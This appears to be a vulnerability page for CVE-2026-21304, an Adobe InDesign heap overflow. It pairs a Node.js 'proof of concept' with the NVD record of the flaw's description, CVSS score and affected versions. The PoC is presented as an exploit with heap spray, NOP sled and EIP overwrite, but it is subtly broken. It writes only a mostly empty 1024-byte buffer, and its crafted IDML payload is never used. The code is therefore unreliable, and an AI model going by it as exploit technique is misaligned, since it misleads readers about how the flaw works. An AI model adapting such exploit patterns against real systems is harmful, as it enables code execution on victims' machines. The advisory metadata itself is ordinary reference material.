CVE-2026-21304

// CVE-2026-21304 PoC - Malicious InDesign File Trigger // This PoC demonstrates the heap overflow vulnerability in Adobe InDesign // Note: This is a conceptual PoC for educational purposes only const fs = require('fs'); // Create a malicious INX/IDML file with crafted overflow data function createMaliciousFile() { const maliciousData = Buffer.alloc(1024); // Craft specific byte pattern to trigger heap overflow // EIP offset: 0x41414141 (AAAA pattern for testing) maliciousData.write('AAAA', 0x100, 'utf8'); // Heap spray pattern for reliable exploitation const sprayPattern = Buffer.alloc(65536); sprayPattern.fill(0x90); // NOP sled sprayPattern.write('\x41\x42\x43\x44', 0x100, 'binary'); // EIP = ABCD // Malformed XML structure for IDML parsing const idmlPayload = ` <?xml version="1.0" encoding="UTF-8"?> <idPkg:Story xmlns:idPkg="http://ns.adobe.com/AdobeInDesign/idml/1.0/"> <idPkg:Story> <Content> <![CDATA[${sprayPattern.toString('binary').repeat(100)}]]> </Content> </idPkg:Story> </idPkg:Story> `; fs.writeFileSync('CVE-2026-21304_poc.indd', maliciousData); console.log('[+] Malicious InDesign file created: CVE-2026-21304_poc.indd'); console.log('[+] File size:', maliciousData.length, 'bytes'); } createMaliciousFile(); console.log('[+] PoC ready for testing on vulnerable InDesign versions');

{"cve": {"id": "CVE-2026-21304", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:26.337", "lastModified": "2026-01-14T19:29:14.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones de escritorio de InDesign 21.0, 19.5.5 y anteriores están afectadas por una vulnerabilidad de desbordamiento de búfer basado en montículo que podría resultar en ejecución de código arbitrario en el contexto del usuario actual. La explotación de este problema requiere interacción del usuario en el sentido de que una víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.5.1", "matchCriteriaId": "7BFF153C-8825-407C-AF58-4AC567601D68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0", "versionEndExcluding": "21.1", "matchCriteriaId": "7BF7435F-7314-440A-89A8-8C3D4CCCDD63"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/indesign/apsb26-02.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}